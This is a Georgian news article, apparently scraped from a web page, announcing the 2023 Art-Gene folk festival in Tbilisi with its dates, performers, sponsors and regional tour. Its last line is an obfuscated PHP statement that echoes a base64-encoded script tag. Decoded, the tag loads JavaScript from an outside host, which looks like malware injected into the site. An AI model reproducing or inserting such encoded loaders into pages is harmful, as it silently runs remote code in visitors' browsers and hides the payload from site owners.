celsiusi
ავერსი საქკაბელი

„Art-გენი 2023-ს“, ტრადიციისამებრ, კომპანია „ავერსი“ წარადგენს.

„Art-გენის“ თბილისის ტური 20 ივლისს აიღებს სტარტს თბილისის ეთნოგრაფიულ მუზეუმში და 30 ივლისამდე გაგრძელდება.
მე-20, საიუბილეო წელთან დაკავშირებით ფესტივალი მაყურებელს რამდენიმე სიახლეს ჰპირდება.

20 ივლისს „Art-გენი 2023-ს“ „სუხიშვილები“ გახსნიან. 21 ივლისს მსმენელს წარუდგებიან რობი კუხიანიძე & Outsaider და CIRCUS MIRCUS; 22 ივლისს - „კახაბერი და ხანუმები“; 23 ივლისს - ნინო ქათამაძე & INSIGHT, პაპუნა შარიქაძე & ხონძი; 28 ივლისი „თამადას“ დაეთმობა, 29 ივლისი - GAGA FRANI-ს. ფესტივალს 30 ივლისს ნიაზ დიასამიძე დახურავს.

ფესტივალის მხარდამჭერები არიან კულტურის სამინისტრო და თბილისის მერია, სპონსორები - „ნატახტარი“, „ბორჯომი“, „კენვუდი“, „ლიდერფუდი“, მედიაპარტნიორები - „პირველი არხი“, რადიო „ფორტუნა“, რადიო „უცნობი“.

„Art-გენი 2023“ რეგიონული ტურნეთი დაიწყო. 1 ივლისს ღონისძიება დმანისში, პანტიანის ტბაზე გაიმართა, 7 ივლისს კი ფესტივალს რუსთავმა უმასპინძლა.

ფესტივალი „Art-გენი“ 2004 წელს დაფუძნდა. 20 წლის განმავლობაში მან მთელ საქართველოში უნიკალური ეთნოგრაფიული მასალები მოიძია და დააარქივა.

ფესტივალის საიუბილეო პროგრამასა და დაგეგმილ სიახლეებთან დაკავშირებით 17 ივლისს, მცხეთაში, რესტორან „ფლორიას“ ეზოში, პრესკონფერენცია გაიმართება. 

(რ)

363
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");